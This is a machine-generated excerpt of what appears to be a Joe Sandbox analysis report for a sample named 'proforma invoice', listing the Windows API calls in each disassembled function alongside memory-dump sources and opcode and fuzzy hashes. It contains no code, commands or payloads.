                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00B3CB68), ref: 00B0D376
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateDirectory$AttributesErrorFileLast
                  • String ID:
                  • API String ID: 2267087916-0
                  • Opcode ID: e986e7c15e15857c8474f85394886d7d57c219ecb9eebfe40d60870325eaf6ea
                  • Instruction ID: b2639fcfec32c40d0e3f1db4ecce7958aa4733caf5777c4bc49d90864acd1c04
                  • Opcode Fuzzy Hash: e986e7c15e15857c8474f85394886d7d57c219ecb9eebfe40d60870325eaf6ea
                  • Instruction Fuzzy Hash: 02217C705083019FC700DFA8C98186FBBE4EE5A364F204A5DF499D72E1EB309946CB97
                  APIs
                    • Part of subcall function 00B01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B0102A
                    • Part of subcall function 00B01014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B01036
                    • Part of subcall function 00B01014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B01045
                    • Part of subcall function 00B01014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B0104C
                    • Part of subcall function 00B01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B01062
                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00B015BE
                  • _memcmp.LIBVCRUNTIME ref: 00B015E1
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B01617
                  • HeapFree.KERNEL32(00000000), ref: 00B0161E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                  • String ID:
                  • API String ID: 1592001646-0
                  • Opcode ID: 2c6ef1454f484f511427d1e39e4c10ba549b679479a9016f44f14e5047971896
                  • Instruction ID: b75a6ad55ec4e235686297672c59d4982c25b8f974f288ebe6e896741e4b989b
                  • Opcode Fuzzy Hash: 2c6ef1454f484f511427d1e39e4c10ba549b679479a9016f44f14e5047971896
                  • Instruction Fuzzy Hash: 2F217C31E00108AFDB18DFA8CD45BEEBBF8EF44344F184899E441AB291E731AA45DB50
                  APIs
                  • GetWindowLongW.USER32(?,000000EC), ref: 00B3280A
                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B32824
                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B32832
                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B32840
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$Long$AttributesLayered
                  • String ID:
                  • API String ID: 2169480361-0
                  • Opcode ID: c07a73ea5be4b61c6c7bcff31879a12fca9665dbb89b3ff4e95b38ef8ae4c1b7
                  • Instruction ID: f5734f314edb935942cac831cb84c4a5456a5fc26c72f893df81400cf4a5cf36
                  • Opcode Fuzzy Hash: c07a73ea5be4b61c6c7bcff31879a12fca9665dbb89b3ff4e95b38ef8ae4c1b7
                  • Instruction Fuzzy Hash: F721B331605511AFD7149B24C855FAA7B95FF46324F258198F4268B6E2CB71FC42C790
                  APIs
                    • Part of subcall function 00B08D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00B0790A,?,000000FF,?,00B08754,00000000,?,0000001C,?,?), ref: 00B08D8C
                    • Part of subcall function 00B08D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00B08DB2
                    • Part of subcall function 00B08D7D: lstrcmpiW.KERNEL32(00000000,?,00B0790A,?,000000FF,?,00B08754,00000000,?,0000001C,?,?), ref: 00B08DE3
                  • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00B08754,00000000,?,0000001C,?,?,00000000), ref: 00B07923
                  • lstrcpyW.KERNEL32(00000000,?), ref: 00B07949
                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00B08754,00000000,?,0000001C,?,?,00000000), ref: 00B07984
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: lstrcmpilstrcpylstrlen
                  • String ID: cdecl
                  • API String ID: 4031866154-3896280584
                  • Opcode ID: 6e5e86c5c6a7d0c3c2c4199c27c3c02612acae37d08ad9982ba343366f59e1ab
                  • Instruction ID: 2b1fc3aa76bde77fc61221e6dec68ddcbd09801fb59e722b1029c1edd099df6a
                  • Opcode Fuzzy Hash: 6e5e86c5c6a7d0c3c2c4199c27c3c02612acae37d08ad9982ba343366f59e1ab
                  • Instruction Fuzzy Hash: 6411E13A200202BFCB159F38C845D7ABBE9EF85350B50806AE842C72A4EF31A911D7A1
                  APIs
                  • GetWindowLongW.USER32(?,000000F0), ref: 00B37D0B
                  • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00B37D2A
                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B37D42
                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B1B7AD,00000000), ref: 00B37D6B
                    • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$Long
                  • String ID:
                  • API String ID: 847901565-0
                  • Opcode ID: b8e3cab28caeb0faee5fe75c0a0d24a67385155c9471fff964343dfdbaf09c12
                  • Instruction ID: 71ea17539380beed1e9db98947c08abc920fc1c8f88f389844b20843318752c0
                  • Opcode Fuzzy Hash: b8e3cab28caeb0faee5fe75c0a0d24a67385155c9471fff964343dfdbaf09c12
                  • Instruction Fuzzy Hash: D911ACB6244654AFCB208F6CCC04AAA3BE4EF45360F218764F939D72E0DF308961DB50
                  APIs
                  • SendMessageW.USER32(?,00001060,?,00000004), ref: 00B356BB
                  • _wcslen.LIBCMT ref: 00B356CD
                  • _wcslen.LIBCMT ref: 00B356D8
                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B35816
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend_wcslen
                  • String ID:
                  • API String ID: 455545452-0
                  • Opcode ID: 0c89f1b1888edc3b09b022baf76743bfbe48f49a58e9fbaebed9a68ac2945b94
                  • Instruction ID: 240ab5193433ef508216d9cbc2ec9e1ac5a6180f434375ee881cd6d5d26bec26
                  • Opcode Fuzzy Hash: 0c89f1b1888edc3b09b022baf76743bfbe48f49a58e9fbaebed9a68ac2945b94
                  • Instruction Fuzzy Hash: 7911D37560061896DB30DFA5CCC6AEE77ECEF15760F7041AAF915D6181EB70DA80CB60
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8cfab4b669815ca071df9ab3f53025906ec2918e561fe1a22e3ae9c9b14d25dc
                  • Instruction ID: 24732365b8b49cfa5ec34d4a23cfa5bab1c46384f676abc061a2e74cab6b9a05
                  • Opcode Fuzzy Hash: 8cfab4b669815ca071df9ab3f53025906ec2918e561fe1a22e3ae9c9b14d25dc
                  • Instruction Fuzzy Hash: 590162B2209A167EF62126B87CC1F67766EDF917B8B340327F567613D2DB608C409270
                  APIs
                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B01A47
                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B01A59
                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B01A6F
                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B01A8A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 62b555150a20a1b2a108d1c6cbb23530c12a8daaaecbc859c6387f03dde2066d
                  • Instruction ID: dbe494d6e84d7763a378e6a46b7c88bf4a24b0cf4b8b5f25d9645ddea6e08d24
                  • Opcode Fuzzy Hash: 62b555150a20a1b2a108d1c6cbb23530c12a8daaaecbc859c6387f03dde2066d
                  • Instruction Fuzzy Hash: AE11FA3AA01219FFEB119BA9CD85FADBBB8EB04750F200491E614B7290DA716E50DB94
                  APIs
                  • GetCurrentThreadId.KERNEL32 ref: 00B0E1FD
                  • MessageBoxW.USER32(?,?,?,?), ref: 00B0E230
                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B0E246
                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B0E24D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                  • String ID:
                  • API String ID: 2880819207-0
                  • Opcode ID: addd8afd9413a2f4184b800a90f7a7aa88de5d3b191bab4181222c552192b7b9
                  • Instruction ID: ef8002e9e89b4e4bffa6083bf083ed99e55d42b5020861f7123385c490180780
                  • Opcode Fuzzy Hash: addd8afd9413a2f4184b800a90f7a7aa88de5d3b191bab4181222c552192b7b9
                  • Instruction Fuzzy Hash: 7211A176904254BBC7019FECAC09A9E7FACEB45324F154A69F928E3291DAB0D94487A0
                  APIs
                  • CreateThread.KERNEL32(00000000,?,00ACCFF9,00000000,00000004,00000000), ref: 00ACD218
                  • GetLastError.KERNEL32 ref: 00ACD224
                  • __dosmaperr.LIBCMT ref: 00ACD22B
                  • ResumeThread.KERNEL32(00000000), ref: 00ACD249
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Thread$CreateErrorLastResume__dosmaperr
                  • String ID:
                  • API String ID: 173952441-0
                  • Opcode ID: 32145fd1844c4d15374d663edfd8ed4cea16e12c2e2593aa224a789f2af9f1c6
                  • Instruction ID: a90bb23a25e9d30f8c8d512700d8a8a72ad39b91ca4ee613d9247db59698bd83
                  • Opcode Fuzzy Hash: 32145fd1844c4d15374d663edfd8ed4cea16e12c2e2593aa224a789f2af9f1c6
                  • Instruction Fuzzy Hash: 05018076805204BBDB215BA9DC09FEE7E69EF81731F22422DF925A61D0DF71C901D7A0
                  APIs
                    • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                  • GetClientRect.USER32(?,?), ref: 00B39F31
                  • GetCursorPos.USER32(?), ref: 00B39F3B
                  • ScreenToClient.USER32(?,?), ref: 00B39F46
                  • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00B39F7A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Client$CursorLongProcRectScreenWindow
                  • String ID:
                  • API String ID: 4127811313-0
                  • Opcode ID: 0ebf0543a3d4845c42b7f3c4664c6f34a40824819de710280b194a0133c3e277
                  • Instruction ID: c8157a6156ffb423f3b127662d9c11f2693461ca54d08e3a6f168b714dd573d6
                  • Opcode Fuzzy Hash: 0ebf0543a3d4845c42b7f3c4664c6f34a40824819de710280b194a0133c3e277
                  • Instruction Fuzzy Hash: 1D112A3690011ABBDB10EFA8D886DEE7BB9FB45311F204495F911E3151DB70BA81CBA1
                  APIs
                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AA604C
                  • GetStockObject.GDI32(00000011), ref: 00AA6060
                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA606A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateMessageObjectSendStockWindow
                  • String ID:
                  • API String ID: 3970641297-0
                  • Opcode ID: c9b3b64f72f91e7236ca4a61495b0625baebcabf73070514a9a1e1add392e48b
                  • Instruction ID: d749ad79949d33370d2aca1c5d72065f68ea9581c3cf43ccd612dfff49536ac9
                  • Opcode Fuzzy Hash: c9b3b64f72f91e7236ca4a61495b0625baebcabf73070514a9a1e1add392e48b
                  • Instruction Fuzzy Hash: 7B116D72501949BFEF124FA49C44EEABF6DEF093A5F194215FA1463150DB329CA0EFA0
                  APIs
                  • ___BuildCatchObject.LIBVCRUNTIME ref: 00AC3B56
                    • Part of subcall function 00AC3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00AC3AD2
                    • Part of subcall function 00AC3AA3: ___AdjustPointer.LIBCMT ref: 00AC3AED
                  • _UnwindNestedFrames.LIBCMT ref: 00AC3B6B
                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00AC3B7C
                  • CallCatchBlock.LIBVCRUNTIME ref: 00AC3BA4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                  • String ID:
                  • API String ID: 737400349-0
                  • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                  • Instruction ID: 66a04a1d869950e0cdf5bb13ea439dbdb65293ffe8de1569a6c4a32ddb76f804
                  • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                  • Instruction Fuzzy Hash: 5901D733100149BBDF126F95CD46EEB7B6DEF58754F068018FE4866121C632E9619BA0
                  APIs
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00AA13C6,00000000,00000000,?,00AD301A,00AA13C6,00000000,00000000,00000000,?,00AD328B,00000006,FlsSetValue), ref: 00AD30A5
                  • GetLastError.KERNEL32(?,00AD301A,00AA13C6,00000000,00000000,00000000,?,00AD328B,00000006,FlsSetValue,00B42290,FlsSetValue,00000000,00000364,?,00AD2E46), ref: 00AD30B1
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00AD301A,00AA13C6,00000000,00000000,00000000,?,00AD328B,00000006,FlsSetValue,00B42290,FlsSetValue,00000000), ref: 00AD30BF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID:
                  • API String ID: 3177248105-0
                  • Opcode ID: 0d1989a52d1022e2790106119aa590c69a31e7eed13f2aaec88a12b75be1ce2e
                  • Instruction ID: ebb143d9faea073a6fffa4f4d991eecbaf62ab193b52a03026e235580765cdf1
                  • Opcode Fuzzy Hash: 0d1989a52d1022e2790106119aa590c69a31e7eed13f2aaec88a12b75be1ce2e
                  • Instruction Fuzzy Hash: 0601F737701222ABCF314BB8AC44A5B7BA8AF05B61B240621F907F7340CB21D901C7E1
                  APIs
                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00B0747F
                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00B07497
                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00B074AC
                  • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00B074CA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Type$Register$FileLoadModuleNameUser
                  • String ID:
                  • API String ID: 1352324309-0
                  • Opcode ID: 4618238d7980e061c8aeb0facefd4d40aec48762c772ca754d3deb53ffd40033
                  • Instruction ID: fee56db19181c9d57f01b22fed666847d10173763b33b94b4b06ce0471f8a3e2
                  • Opcode Fuzzy Hash: 4618238d7980e061c8aeb0facefd4d40aec48762c772ca754d3deb53ffd40033
                  • Instruction Fuzzy Hash: 3F11A5B56453149BE7208F54EC48F9ABFFCEB00700F108599A556D7291DB70F904DB90
                  APIs
                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B0ACD3,?,00008000), ref: 00B0B0C4
                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B0ACD3,?,00008000), ref: 00B0B0E9
                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B0ACD3,?,00008000), ref: 00B0B0F3
                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B0ACD3,?,00008000), ref: 00B0B126
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CounterPerformanceQuerySleep
                  • String ID:
                  • API String ID: 2875609808-0
                  • Opcode ID: 1cc80e1f234cc7c9cfe67fa5ee7b6ea25a57f69d2184e5e59cc915beb6aaf8a7
                  • Instruction ID: f333a79e0e4da3b9ce0fe2d4a771abef6f28afd7a7f2452dc5669616c44ad783
                  • Opcode Fuzzy Hash: 1cc80e1f234cc7c9cfe67fa5ee7b6ea25a57f69d2184e5e59cc915beb6aaf8a7
                  • Instruction Fuzzy Hash: 8C113931C01928E7CF00AFE4E998AEEBFB8FF09711F204085D941B3181CF305A609B91
                  APIs
                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B02DC5
                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B02DD6
                  • GetCurrentThreadId.KERNEL32 ref: 00B02DDD
                  • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B02DE4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                  • String ID:
                  • API String ID: 2710830443-0
                  • Opcode ID: 68dc53d12940f1c1605e0ad1b05a2633211429303a292c152dc33efee3e0c3e7
                  • Instruction ID: e7d80db41cc31785d2511c15d5d85596ed4b68347d4f8a27583ecc8a06840fa5
                  • Opcode Fuzzy Hash: 68dc53d12940f1c1605e0ad1b05a2633211429303a292c152dc33efee3e0c3e7
                  • Instruction Fuzzy Hash: 7DE06D711016247ADB201BA29C0EEEB3EACEB42BA1F200165B506E30809AA0C844C7B0
                  APIs
